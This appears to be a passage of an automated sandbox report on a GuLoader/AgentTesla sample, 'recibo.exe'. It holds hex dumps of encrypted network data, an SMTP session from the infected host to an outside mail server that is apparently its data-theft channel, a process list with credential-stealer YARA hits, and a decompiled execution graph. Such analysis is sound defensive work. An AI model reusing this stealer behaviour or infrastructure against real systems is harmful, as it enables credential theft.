1f f5 98 85 a2 70 27 ad 5e 32 b9 65 96 fb dd e8 76 ee 68 a6 ee 5b dc b2 a6 7d 05 9b 4e 07 3c 5a a0 0b 32 3c 02 5e b5 a2 b5 68 3d 01 7c cd 55 34 8d 84 fd 48 a8 51 11 79 35 c7 94 e8 9b cc fc 6a 6f e0
                                                                                Data Ascii: `WWZ7Q'vcM95VIEH~3]"k,|jHW3&]U?qOeV*?a.Pg+FP)-Bu|TXVfQet6?yht= 5(9S$B,|iz6p'^2evh[}N<Z2<^h=|U4HQy5jo
                                                                                2022-05-27 11:26:33 UTC188INData Raw: 23 24 c2 cd 9a 61 7c 1a de 47 f0 85 28 af 21 dc 43 47 c0 1f 1a cb f0 99 21 68 57 f1 78 49 01 a2 9c e2 71 9e a8 2d 88 f8 6a 98 af f9 c5 cc ec 32 87 dc 7c a3 8c 2b 6a de 7a c8 73 94 3a a1 d2 4e 22 14 dc 1b a1 43 ff ce fd 87 a4 f7 40 93 72 fd df 72 86 e5 ee 34 b0 4b 26 e1 c0 45 19 a5 01 e4 9c cf e0 16 55 f8 20 4e 50 80 10 19 2a a8 e9 89 09 8c 5c 03 9a 92 ef cd cd 23 e9 14 8f 16 e6 60 3e a7 52 8e 30 f4 8f 20 1e 4d 62 a8 18 d2 fe 8f ea b6 28 f6 62 6b 24 42 65 d5 60 b4 1f 36 d8 42 8f d8 d3 7a 10 c2 57 f3 0b 1a 70 a8 e2 e9 ae 3c 75 d6 06 4e 9c 2f 25 83 0d 09 2a 1f fd b3 1c 56 fe 16 9a 2f 25 0e 3f 03 c7 7d fa fe fd 32 71 ea 94 a2 73 d8 eb e9 6c 26 7e 2a ee 07 24 eb d9 4c bb 0c c5 90 59 ec d6 a0 2b 67 6d 51 ac cd 7c 23 0c fa 34 aa e5 f1 61 dc 89 e1 e3 f7 84 76 9f
                                                                                Data Ascii: #$a|G(!CG!hWxIq-j2|+jzs:N"C@rr4K&EU NP*\#`>R0 Mb(bk$Be`6BzWp<uN/%*V/%?}2qsl&~*$LY+gmQ|#4av
                                                                                2022-05-27 11:26:33 UTC189INData Raw: 1f 49 72 d3 1d ef 6d a5 00 95 6b de 99 6a bc 88 e5 d7 5f 45 41 4e 94 7f 9f 98 3a 4b ca d5 ed 76 5e c0 fd 55 be d8 25 ee 0a fd df da 0c 25 17 7a 16 1d 09 7b d3 ce 32 c5 72 b7 5c 2f 1e bf c7 63 9d 51 d1 b5 6c 1d 87 a6 4f 16 cd d4 fe b0 82 35 32 fd 7a de 38 5a 86 3e 64 f8 28 93 38 7b 72 14 29 cf 16 c0 0b f4 32 f5 23 65 9b e4 3d 2c 03 c4 21 b1 56 b1 4f 14 4d 5d 84 45 c9 10 f0 23 69 a5 2c c0 99 6e bb bf 1b e5 48 6b 82 7b 3f d4 e8 b7 f4 c2 4d 43 0d 9b 6c e1 1e 61 56 6a 06 4c 1f f0 b4 e4 31 33 f9 5c 53 d7 3a 25 c7 3d cf a8 ab 92 2e 65 40 84 09 6e c0 08 c3 19 8e d8 d8 d8 16 e2 9c 60 f8 67 ad b4 5a ad b5 66 37 9e e6 32 23 6e 5f 18 c9 ec d8 67 9e 78 12 04 08 33 42 4c 63 bd cd a8 5b 37 28 85 ff c0 1f 50 67 f4 4d 7d 7f 7e ab 15 4f 2b 53 34 91 dc 8f c3 9e ad 60 28 f3
                                                                                Data Ascii: Irmkj_EAN:Kv^U%%z{2r\/cQlO52z8Z>d(8{r)2#e=,!VOM]E#i,nHk{?MClaVjL13\S:%=.e@n`gZf72#n_gx3BLc[7(PgM}~O+S4`(
                                                                                2022-05-27 11:26:33 UTC190INData Raw: 92 85 b3 d1 28 92 fe ac bb 58 f6 8d e8 05 43 db 9b 1f b0 59 a8 dc ad 98 cc 7e 1e d6 4d 0c 2f 0b 8e 7d 5c 61 2f 50 70 59 2f 90 48 48 2e 23 14 2e ca 94 8b 9e 55 35 d5 85 10 cb 00 9c 90 5d 5e d7 fd e2 28 7c f7 68 8a b0 64 36 35 80 59 f7 79 df 2a b2 95 69 ff 4c 2c 4a 05 80 bb 1c 26 9e a2 8e d5 9b 4e de 16 bc a8 e1 0b 41 9e cf 7c 50 0d 74 ca 8e c5 7d e9 5c 1c 3a 97 b6 8e ac 87 80 15 61 24 92 88 26 2f 80 e9 94 b1 01 80 54 68 56 ee f6 e0 18 9a d8 fd 19 1c 82 e1 13 44 39 4c a4 ef c3 3e 48 4e 45 49 98 66 f2 96 bf 27 45 36 45 1d 9f 35 a1 ab 38 24 d1 78 f5 05 c3 b0 35 4c ad c1 74 bb 22 f9 fb cd a6 74 8f 1b a6 d4 15 ce d1 d1 7d b8 dd 5c 62 47 5a 1f 4d 20 5b 7d 5e 24 eb e6 2b 7c 43 e6 c9 18 77 2d c0 bc 4b e3 12 b5 3f 76 c7 c1 ab 36 84 66 6e 06 a3 33 19 fe 04 0f 2a 5d
                                                                                Data Ascii: (XCY~M/}\a/PpY/HH.#.U5]^(|hd65Yy*iL,J&NA|Pt}\:a$&/ThVD9L>HNEIf'E6E58$x5Lt"t}\bGZM [}^$+|Cw-K?v6fn3*]
                                                                                2022-05-27 11:26:33 UTC191INData Raw: 31 bd 1d ff cc 71 86 4b aa 43 1a 96 2e 7d a9 ff e8 7b 53 1b 9e 78 36 54 95 d9 83 7e e1 f2 16 c0 99 6a c2 fa c4 a7 ad e3 6e dd 82 17 b8 8c 10 3f 9d 1c f2 7c ba 60 88 ab 64 4e 48 b6 09 fe 6a b2 e0 fd ed ca a6 04 db 7d 50 be 71 cf 6e ee 70 de bd 6e 97 d0 78 79 8c 6c 05 9d 85 8e 17 31 f4 0d 2b 31 e4 76 78 2a cf 88 25 6e e1 28 5c de 5e 9b 26 cd ca 8c c5 d0 e2 87 0e 5e 8e 03 ce 5e c4 eb 0e 6b 41 07 08 78 86 9d cf b8 a3 45 14 05 a1 52 03 07 9f 02 ed 4c 23 b4 8d e9 4e a4 f4 57 ce 27 4c 0f 72 17 94 a4 d3 ab c1 12 06 46 49 9a 1c 41 28 4c a3 2c 8a 99 b7 7a 0a f9 2c ff 4c 41 1b 38 ee a2 ab 98 ab f5 16 1b a4 fb b7 7b 32 90 1a 0b cd 1a e7 84 ab 6e 42 d1 4e d1 66 88 3c 50 73 bc 46 64 12 67 21 c5 ac 3e 39 06 1e 5d 3f 8d 3a 6b 09 e0 0b 8d 6f 8e 31 f7 56 63 fc ca 63 7f ed
                                                                                Data Ascii: 1qKC.}{Sx6T~jn?|`dNHj}Pqnpnxyl1+1vx*%n(\^&^^kAxERL#NW'LrFIA(L,z,LA8{2nBNf<PsFdg!>9]?:ko1Vcc
                                                                                2022-05-27 11:26:33 UTC193INData Raw: 76 78 1e 17 7d e0 e5 c4 71 bf 2d 08 a5 0d ca c6 ff d2 db 72 35 87 00 a1 b6 25 55 ba f8 fd b3 43 2f 73 5b 91 97 6d 4d 70 81 73 fa 70 1b bf ad 50 2f 17 3d 16 44 7a d3 a3 f8 de 71 bf d2 18 3e ce 0c 21 10 81 b3 fe b1 e6 8c 66 f9 13 b9 7e 6e e8 9c 2c 0a 4c f5 54 1e 73 2f 49 f4 59 ad 6e f4 61 c5 41 d5 d0 8b 5a 06 67 93 64 17 35 de 23 7b 2d 60 c3 c2 ab 74 f0 67 0d 92 48 08 d0 29 d2 d3 7f b8 0a 17 cf 00 50 b8 8c e8 92 39 12 14 40 b9 04 ee 52 ae 35 1e 6a 6a 1e c3 c7 b9 78 54 8a 6c 1f dd 5f c2 80 5a cf 9d cf 81 70 a4 32 ea 6c 2d a6 04 b6 f3 c9 b2 b4 fe 59 e8 f0 99 f9 17 c8 83 04 86 dd ed 57 d3 87 1b 47 01 19 c2 b6 bd b9 09 fb 66 7e 19 7c 5e 27 42 03 a3 a9 60 05 55 5c d1 9b d8 6e 75 26 91 28 33 1f 64 cf 46 20 47 27 72 f9 c9 eb f1 f5 c9 05 28 95 ed 17 e0 6e 4b a9 9f
                                                                                Data Ascii: vx}q-r5%UC/s[mMpspP/=Dzq>!f~n,LTs/IYnaAZgd5#{-`tgH)P9@R5jjxTl_Zp2l-YWGf~|^'B`U\nu&(3dF G'r(nK
                                                                                2022-05-27 11:26:33 UTC193INData Raw: 02 d2 c2 06 08 55 dc b9 3e 34 6b ed 93 2e f5 39 d4 0b 50 c7 c5 87 5b bc 44 1c 02 e0 63 0f cf 50 03 3a 29 37 a4 99 70 b3 1d 2f 00 2f 15 64 42 1f 18 65 e5 fb c8 10 96 3c 3f 9d 0e da c6 e1 d2 93 50 3a 93 18 b1 c4 12 20 95 fc e4 b2 4f 18 6b 5f 9d b0 62 61 75 9e 73 fa 6c 1f be ad 7e 3e 18 10 14 5e 5d d0 aa 94 f8 60 ae da 03 35 c4 0c 3c 11 ed 9e 8a 82 f3 af 57 e2 31 b9 4b 6c e8 9f 17 0e 22 d6 5d 0f 21 22 5b ea 52 af 78 91 33 e3 4e ce c2 80 3d 2e 6b e0 50 17 31 d5 4f 40 3e 7d d5 ca b5 62 95 23 3a 9b 5b 19 c7 1c de bf 59 ca 2c 19 d5 16 3f 99 9c 84 81 35 05 2a 7e ac 29 e5 73 a4 36 0a 72 6a 1e d4 d0 a2 50 54 80 7d 3d d3 49 d3 bf 4b ae 9a cf f5 6a 8e 3a f3 66 5f 83 13 ad db fc ba ba f7 72 da e9 9d 8d 01 ad b3 3e ac d1 f5 57 9d 81 13 56 5e 1d c6 ac b8 aa 0e eb 6c 13
                                                                                Data Ascii: U>4k.9P[DcP:)7p//dBe<?P: Ok_bausl~>^]`5<W1Kl"]!"[Rx3N=.kP1O@>}b#:[Y,?5*~)s6rjPT}=IKj:f_r>WV^l
                                                                                2022-05-27 11:26:33 UTC195INData Raw: 3e 23 53 e9 72 71 05 15 0f c8 cb 76 0e 69 3d 5f 4c 8a 6f 5f 39 f7 79 80 62 e9 54 d1 25 66 fe ba 61 58 8c 24 99 0a 82 a2 93 d1 3b a3 9d c2 8a 44 c0 a5 f6 14 36 8c ef 2c 86 4c be fc ad 8b fd 0c 71 f5 4c 29 2e 1e db 18 28 5b 0b 7f 54 0a 20 b4 0e 2d 6a 4a 05 2a ca ae 8e b8 7c 6b bc d5 38 f7 10 9b 95 56 07 d7 fc cc 45 38 a5 2f aa a6 27 74 6f c3 7c c1 69 85 54 f2 de 43 a5 06 14 48 26 cc c5 5e 6c b2 ff d1 ed 8b 7a fd 5c 8b 9b 88 21 67 9e d9 44 23 3f 50 a7 e7 c0 0f c0 6a 75 35 b1 b6 b8 82 d2 af 3b 0f 27 d3 dc 0e 06 9b ca 9c d5 13 89 45 71 72 f1 f4 ae 3b 9f bd ff 71 7a 87 89 74 40 51 0b 87 f3 95 16 4c 3b 60 44 d1 69 fc f9 af 22 24 0f 4d 06 92 1c a1 8d 12 24 f7 52 f5 27 e9 b0 17 66 ad e0 53 cf 3a eb 9a f6 97 03 81 2b c2 fe 36 bd da 93 3e b3 f2 2c 72 71 3f 31 6e 53
                                                                                Data Ascii: >#Srqvi=_Lo_9ybT%faX$;D6,LqL).([T -jJ*|k8VE8/'to|iTCH&^lz\!gD#?Pju5;'Eqr;qzt@QL;`Di"$M$R'fS:+6>,rq?1nS
                                                                                2022-05-27 11:26:33 UTC196INData Raw: 57 4d f1 a1 fc 6a 56 22 fd 3e 18 0a 56 e3 32 02 4f 53 62 f1 d0 e2 cb d3 c1 14 61 86 ed 0e bf 44 41 b9 b5 dc 0b 1f 54 8d 3d 8c dc 4d eb 2e bc 33 19 bd 4f 6e 99 91 cd 72 2a 2b b0 1d 1f 0e f3 f1 d9 19 ca a8 45 fe ae 07 c6 d4 b6 ac 94 a2 61 e0 ed 01 8b f8 1d 08 9d 32 c9 0f b5 7b e4 ba 6a 50 54 a7 3e cc 6a bc d5 8f c7 c6 a6 12 db 13 71 b0 1c 89 46 ad 45 c6 cd 52 99 84 6b 79 e2 7d 02 f2 94 82 17 10 fb 78 23 50 a6 7e 19 69 c6 e9 61 67 84 19 6d 9a 79 81 47 8a d7 e9 f9 e1 a6 b2 15 7d e1 3c d0 54 d1 e0 6d 56 57 2f 25 6d 86 90 aa ad bf 4e 17 01 ac 26 25 08 eb 00 83 1c 35 b5 fd c0 59 be 8d 74 ca 27 72 5c 53 07 f1 82 df ab c6 1f 76 7a 6d e8 35 4e 7b 68 b3 49 a7 95 b7 7c 0d 8d 11 c8 3f 47 0b 6c e5 ab ce 93 c9 86 15 0d fb c9 a6 1e 2d b7 16 0f da 18 8e aa c2 5f 55 b4 63
                                                                                Data Ascii: WMjV">V2OSbaDAT=M.3Onr*+Ea2{jPT>jqFERky}x#P~iagmyG}<TmVW/%mN&%5Yt'r\Svzm5N{hI|?Gl-_Uc
                                                                                2022-05-27 11:26:33 UTC197INData Raw: bd 34 46 54 cd 91 2d c9 51 d2 16 35 9d e3 9a 59 cc 67 1e 67 a3 43 7b f9 74 6c 2c 2d 45 97 8a 04 81 1f 4a 48 38 70 52 74 22 1b 72 f4 89 c3 01 f8 2b 0c e8 06 de b3 f6 c7 93 75 2b e3 0b b4 b6 30 52 bb f9 e4 de 64 0a 0a 68 85 df 48 52 14 a8 67 fa 64 0f d3 8f 40 5c 3a 04 77 4b 6f bf a4 89 9d 60 ab b3 08 2a 86 08 3e 74 8b a7 fe 91 f2 f8 70 f2 63 9f 4a 1c c3 83 64 2e 50 91 7e 09 73 00 5a 9a 75 b3 0b 93 56 d4 7d f8 d4 84 4f 6a 41 ff 45 19 30 b0 1b 7b 0f 6c e4 d9 c7 55 99 51 0d 9d 59 13 c7 16 e8 da 6a d9 3b 19 d5 1c 4d 97 81 89 87 5c 04 39 0d bb 1f 80 7b b3 51 28 63 7d 1e c0 c1 a4 7e 50 94 4d 37 d3 5f d2 9e 3f 8d 87 c4 94 5d 93 01 e2 68 49 a4 13 c2 ff c7 9a e9 d8 65 f0 ed 88 96 37 c8 85 2d a9 d7 e4 62 ef 89 00 4b 65 3b d5 c2 a2 9c 52 dc 7b 6a 2f 61 5d 11 69 10 b8
                                                                                Data Ascii: 4FT-Q5YggC{tl,-EJH8pRt"r+u+0RdhHRgd@\:wKo`*>tpcJd.P~sZuV}OjAE0{lUQYj;M\9{Q(c}~PM7_?]hIe7-bKe;R{j/a]i
                                                                                2022-05-27 11:26:33 UTC198INData Raw: 02 15 a6 e1 1f 39 74 10 4d 50 89 2d 45 3c ea 78 9c 6d e2 16 f5 25 6c fc e4 49 65 be 35 8a 2f 9f b3 9f cc 5c e4 ad d8 a6 59 d0 b0 e7 1f 11 88 e8 4d b2 5d b8 ca 80 84 94 24 7a cc 4d 21 24 0c bf 06 3d 5d 01 79 56 79 67 96 1f 09 5c 4a 01 2e dd bf b1 b8 7a 68 a6 b9 3a c1 10 b6 ac 4a 0f a7 da d1 5c 21 a1 2e cf b0 2b 76 67 c3 7f 84 53 9c 6e f4 c3 44 a6 04 7a 7b 15 d9 e4 43 7f b9 fd d3 9e d8 48 fa 5b b9 80 8d 2a 73 9e cf 53 25 26 65 b8 a6 e7 18 d2 6e 51 34 b2 c3 80 88 f4 e3 1a 14 2d b1 ed 13 19 80 dd 97 b0 07 ec 76 4b 4b d1 e6 cc 32 92 c4 f2 78 17 a6 92 74 57 5c 6a a5 da f9 3d 68 52 46 49 a2 08 d3 9c b9 1a 56 2d 4f 17 82 07 c4 9a 7a 63 f7 4e bd 2e f2 c4 31 6a c9 f5 53 c8 16 de 88 85 a2 1d 82 3c e7 c2 23 bc db f1 08 a8 fa 2f 07 56 3f 0d 4e 54 48 4d 37 0e d3 d3 0d


Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
May 27, 2022 13:26:44.919852972 CEST | 587 | 49764 | 168.119.38.32 | 192.168.11.20 | 220-isp.gesinfo.es ESMTP Exim 4.95 #2 Fri, 27 May 2022 13:26:44 +0200
    220-We do not authorize the use of this system to transport unsolicited,
    220 and/or bulk e-mail.
May 27, 2022 13:26:44.920175076 CEST | 49764 | 587 | 192.168.11.20 | 168.119.38.32 | EHLO 610930
May 27, 2022 13:26:44.934568882 CEST | 587 | 49764 | 168.119.38.32 | 192.168.11.20 | 250-isp.gesinfo.es Hello 610930 [84.17.52.2]
    250-SIZE 52428800
    250-8BITMIME
    250-PIPELINING
    250-PIPE_CONNECT
    250-AUTH PLAIN LOGIN
    250-STARTTLS
    250 HELP
May 27, 2022 13:26:44.934964895 CEST | 49764 | 587 | 192.168.11.20 | 168.119.38.32 | STARTTLS
May 27, 2022 13:26:44.950790882 CEST | 587 | 49764 | 168.119.38.32 | 192.168.11.20 | 220 TLS go ahead

                                                                                Target ID:1
                                                                                Start time:13:25:57
                                                                                Start date:27/05/2022
                                                                                Path:C:\Users\user\Desktop\recibo.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\Desktop\recibo.exe"
                                                                                Imagebase:0x400000
                                                                                File size:606778 bytes
                                                                                MD5 hash:4680729EDCA682D1B6DE8CF875BBFDF5
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:low

                                                                                Target ID:3
                                                                                Start time:13:26:14
                                                                                Start date:27/05/2022
                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Users\user\Desktop\recibo.exe"
                                                                                Imagebase:0x470000
                                                                                File size:108664 bytes
                                                                                MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:moderate

                                                                                Target ID:4
                                                                                Start time:13:26:14
                                                                                Start date:27/05/2022
                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\Desktop\recibo.exe"
                                                                                Imagebase:0x870000
                                                                                File size:108664 bytes
                                                                                MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:.Net C# or VB.NET
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000000.23175826600.0000000000D00000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.28075201958.000000001D471000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.28075201958.000000001D471000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:moderate

                                                                                Target ID:5
                                                                                Start time:13:26:14
                                                                                Start date:27/05/2022
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff736160000
                                                                                File size:875008 bytes
                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:moderate

                                                                                  Execution Graph

                                                                                  Execution Coverage:3.7%
                                                                                  Dynamic/Decrypted Code Coverage:18.1%
                                                                                  Signature Coverage:24.5%
                                                                                  Total number of Nodes:1262
                                                                                  Total number of Limit Nodes:57
20199 402da6 17 API calls 20198->20199 20200 401682 20199->20200 20201 402da6 17 API calls 20200->20201 20202 40168b 20201->20202 20203 402da6 17 API calls 20202->20203 20204 401694 MoveFileW 20203->20204 20205 4016a0 20204->20205 20206 4016a7 20204->20206 20208 401423 24 API calls 20205->20208 20207 406873 2 API calls 20206->20207 20210 4022f6 20206->20210 20209 4016b6 20207->20209 20208->20210 20209->20210 20211 4062fd 36 API calls 20209->20211 20211->20205 20212 2cb48f5 20214 2cb4914 20212->20214 20213 2cc37f4 3 API calls 20213->20214 20214->20213 20215 2cb4a0e 20214->20215 20216 2cc4e81 20215->20216 20220 2cb4a35 20215->20220 20217 2cc4e88 4 API calls 20216->20217 20218 2cc4e83 20217->20218 20219 2cc4e88 4 API calls 20218->20219 20219->20218 21311 2cb3588 21312 2cb3595 21311->21312 21314 2cb3650 21312->21314 21317 2cc5269 21312->21317 21315 2cc34f4 4 API calls 21314->21315 21316 2cb366b 21315->21316 21318 2cc34f4 4 API calls 21317->21318 21319 2cc527a 21318->21319 21320 2cc34f4 4 API calls 21319->21320 21321 2cc5292 21320->21321 21322 2cc52a0 GetPEB 21321->21322 21323 2cc52ea 21322->21323 21324 2cc34f4 21323->21324 21327 2cc53be 21323->21327 21325 2cc35b9 21324->21325 21326 2cc3617 LoadLibraryA 21324->21326 21328 2cc3d6a 3 API calls 21325->21328 21330 2cc3654 3 API calls 21326->21330 21329 2cc61b4 NtProtectVirtualMemory 21327->21329 21331 2cc35c8 21328->21331 21336 2cc53c4 21329->21336 21332 2cc3626 21330->21332 21333 2cc3654 3 API calls 21331->21333 21332->21312 21334 2cc3610 21333->21334 21334->21326 21335 2cc5b8d 21339 2cc5f27 21335->21339 21343 2cc5c56 21335->21343 21336->21335 21340 2cc56fa 21336->21340 21342 2cb381c 21336->21342 21337 2cc61b4 NtProtectVirtualMemory 21338 2cc61ab 21337->21338 21338->21312 21339->21337 21339->21342 21341 2cc61b4 NtProtectVirtualMemory 21340->21341 21340->21342 21341->21342 21342->21312 21343->21342 21344 2cc61b4 NtProtectVirtualMemory 21343->21344 21345 2cc5f11 21344->21345 21345->21312 20714 40190c 20715 401943 
20714->20715 20716 402da6 17 API calls 20715->20716 20717 401948 20716->20717 20718 405c49 67 API calls 20717->20718 20719 401951 20718->20719 19296 2cc2b9d 19297 2cc2c09 CreateFileA 19296->19297 20732 405513 20733 405523 20732->20733 20734 405537 20732->20734 20735 405529 20733->20735 20744 405580 20733->20744 20736 40553f IsWindowVisible 20734->20736 20740 405556 20734->20740 20738 4044e5 SendMessageW 20735->20738 20739 40554c 20736->20739 20736->20744 20737 405585 CallWindowProcW 20741 405533 20737->20741 20738->20741 20745 404e54 SendMessageW 20739->20745 20740->20737 20750 404ed4 20740->20750 20744->20737 20746 404eb3 SendMessageW 20745->20746 20747 404e77 GetMessagePos ScreenToClient SendMessageW 20745->20747 20749 404eab 20746->20749 20748 404eb0 20747->20748 20747->20749 20748->20746 20749->20740 20759 40653d lstrcpynW 20750->20759 20752 404ee7 20760 406484 wsprintfW 20752->20760 20754 404ef1 20755 40140b 2 API calls 20754->20755 20756 404efa 20755->20756 20761 40653d lstrcpynW 20756->20761 20758 404f01 20758->20744 20759->20752 20760->20754 20761->20758 21098 40261c 21099 402da6 17 API calls 21098->21099 21100 402623 21099->21100 21103 40602d GetFileAttributesW CreateFileW 21100->21103 21102 40262f 21103->21102 19827 40252a 19828 402de6 17 API calls 19827->19828 19829 402534 19828->19829 19830 402da6 17 API calls 19829->19830 19831 40253d 19830->19831 19832 402548 RegQueryValueExW 19831->19832 19835 40292e 19831->19835 19833 402568 19832->19833 19834 40256e RegCloseKey 19832->19834 19833->19834 19838 406484 wsprintfW 19833->19838 19834->19835 19838->19834 19878 40352d SetErrorMode GetVersionExW 19879 4035b7 19878->19879 19880 40357f GetVersionExW 19878->19880 19881 403610 19879->19881 19882 40690a 5 API calls 19879->19882 19880->19879 19883 40689a 3 API calls 19881->19883 19882->19881 19884 403626 lstrlenA 19883->19884 19884->19881 19885 403636 19884->19885 19886 40690a 5 API calls 19885->19886 19887 40363d 19886->19887 19888 40690a 5 API calls 
19887->19888 19889 403644 19888->19889 19890 40690a 5 API calls 19889->19890 19891 403650 #17 OleInitialize SHGetFileInfoW 19890->19891 19969 40653d lstrcpynW 19891->19969 19894 40369d GetCommandLineW 19970 40653d lstrcpynW 19894->19970 19896 4036af 19897 405e39 CharNextW 19896->19897 19898 4036d5 CharNextW 19897->19898 19906 4036e6 19898->19906 19899 4037e4 19900 4037f8 GetTempPathW 19899->19900 19971 4034fc 19900->19971 19902 403810 19903 403814 GetWindowsDirectoryW lstrcatW 19902->19903 19904 40386a DeleteFileW 19902->19904 19907 4034fc 12 API calls 19903->19907 19981 40307d GetTickCount GetModuleFileNameW 19904->19981 19905 405e39 CharNextW 19905->19906 19906->19899 19906->19905 19912 4037e6 19906->19912 19909 403830 19907->19909 19909->19904 19911 403834 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 19909->19911 19910 40387d 19913 403941 19910->19913 19919 405e39 CharNextW 19910->19919 19954 403932 19910->19954 19915 4034fc 12 API calls 19911->19915 20065 40653d lstrcpynW 19912->20065 20070 403b12 19913->20070 19918 403862 19915->19918 19918->19904 19918->19913 19932 40389f 19919->19932 19921 403a69 20077 405b9d 19921->20077 19922 403a7e 19924 403a86 GetCurrentProcess OpenProcessToken 19922->19924 19925 403afc ExitProcess 19922->19925 19930 403acc 19924->19930 19931 403a9d LookupPrivilegeValueW AdjustTokenPrivileges 19924->19931 19927 403908 19934 405f14 18 API calls 19927->19934 19928 403949 19933 405b08 5 API calls 19928->19933 19935 40690a 5 API calls 19930->19935 19931->19930 19932->19927 19932->19928 19936 40394e lstrcatW 19933->19936 19937 403914 19934->19937 19938 403ad3 19935->19938 19939 40396a lstrcatW lstrcmpiW 19936->19939 19940 40395f lstrcatW 19936->19940 19937->19913 20066 40653d lstrcpynW 19937->20066 19941 403ae8 ExitWindowsEx 19938->19941 19942 403af5 19938->19942 19939->19913 19943 40398a 19939->19943 19940->19939 19941->19925 19941->19942 19945 40140b 2 API calls 19942->19945 19946 403996 19943->19946 19947 40398f 
19943->19947 19945->19925 19950 405aeb 2 API calls 19946->19950 19949 405a6e 4 API calls 19947->19949 19948 403927 20067 40653d lstrcpynW 19948->20067 19952 403994 19949->19952 19953 40399b SetCurrentDirectoryW 19950->19953 19952->19953 19955 4039b8 19953->19955 19956 4039ad 19953->19956 20009 403bec 19954->20009 20069 40653d lstrcpynW 19955->20069 20068 40653d lstrcpynW 19956->20068 19959 40657a 17 API calls 19960 4039fa DeleteFileW 19959->19960 19961 403a06 CopyFileW 19960->19961 19966 4039c5 19960->19966 19961->19966 19962 403a50 19963 4062fd 36 API calls 19962->19963 19963->19913 19964 4062fd 36 API calls 19964->19966 19965 40657a 17 API calls 19965->19966 19966->19959 19966->19962 19966->19964 19966->19965 19967 405b20 2 API calls 19966->19967 19968 403a3a CloseHandle 19966->19968 19967->19966 19968->19966 19969->19894 19970->19896 19972 4067c4 5 API calls 19971->19972 19974 403508 19972->19974 19973 403512 19973->19902 19974->19973 19975 405e0c 3 API calls 19974->19975 19976 40351a 19975->19976 19977 405aeb 2 API calls 19976->19977 19978 403520 19977->19978 19979 40605c 2 API calls 19978->19979 19980 40352b 19979->19980 19980->19902 20081 40602d GetFileAttributesW CreateFileW 19981->20081 19983 4030bd 20007 4030cd 19983->20007 20082 40653d lstrcpynW 19983->20082 19985 4030e3 19986 405e58 2 API calls 19985->19986 19987 4030e9 19986->19987 20083 40653d lstrcpynW 19987->20083 19989 4030f4 GetFileSize 19990 4031ee 19989->19990 20008 40310b 19989->20008 20084 403019 19990->20084 19992 4031f7 19994 403227 GlobalAlloc 19992->19994 19992->20007 20096 4034e5 SetFilePointer 19992->20096 19993 4034cf ReadFile 19993->20008 20095 4034e5 SetFilePointer 19994->20095 19996 40325a 20000 403019 6 API calls 19996->20000 19998 403210 20001 4034cf ReadFile 19998->20001 19999 403242 20002 4032b4 31 API calls 19999->20002 20000->20007 20003 40321b 20001->20003 20005 40324e 20002->20005 20003->19994 20003->20007 20004 403019 6 API calls 20004->20008 20005->20005 20006 40328b 
SetFilePointer 20005->20006 20005->20007 20006->20007 20007->19910 20008->19990 20008->19993 20008->19996 20008->20004 20008->20007 20010 40690a 5 API calls 20009->20010 20011 403c00 20010->20011 20012 403c06 20011->20012 20013 403c18 20011->20013 20105 406484 wsprintfW 20012->20105 20014 40640b 3 API calls 20013->20014 20015 403c48 20014->20015 20016 403c67 lstrcatW 20015->20016 20018 40640b 3 API calls 20015->20018 20019 403c16 20016->20019 20018->20016 20097 403ec2 20019->20097 20022 405f14 18 API calls 20023 403c99 20022->20023 20024 403d2d 20023->20024 20026 40640b 3 API calls 20023->20026 20025 405f14 18 API calls 20024->20025 20027 403d33 20025->20027 20028 403ccb 20026->20028 20029 403d43 LoadImageW 20027->20029 20030 40657a 17 API calls 20027->20030 20028->20024 20036 403cec lstrlenW 20028->20036 20037 405e39 CharNextW 20028->20037 20031 403de9 20029->20031 20032 403d6a RegisterClassW 20029->20032 20030->20029 20035 40140b 2 API calls 20031->20035 20033 403da0 SystemParametersInfoW CreateWindowExW 20032->20033 20034 403df3 20032->20034 20033->20031 20034->19913 20040 403def 20035->20040 20038 403d20 20036->20038 20039 403cfa lstrcmpiW 20036->20039 20041 403ce9 20037->20041 20043 405e0c 3 API calls 20038->20043 20039->20038 20042 403d0a GetFileAttributesW 20039->20042 20040->20034 20045 403ec2 18 API calls 20040->20045 20041->20036 20044 403d16 20042->20044 20046 403d26 20043->20046 20044->20038 20047 405e58 2 API calls 20044->20047 20048 403e00 20045->20048 20106 40653d lstrcpynW 20046->20106 20047->20038 20050 403e0c ShowWindow 20048->20050 20051 403e8f 20048->20051 20053 40689a 3 API calls 20050->20053 20052 405672 5 API calls 20051->20052 20054 403e95 20052->20054 20055 403e24 20053->20055 20056 403eb1 20054->20056 20060 403e99 20054->20060 20057 403e32 GetClassInfoW 20055->20057 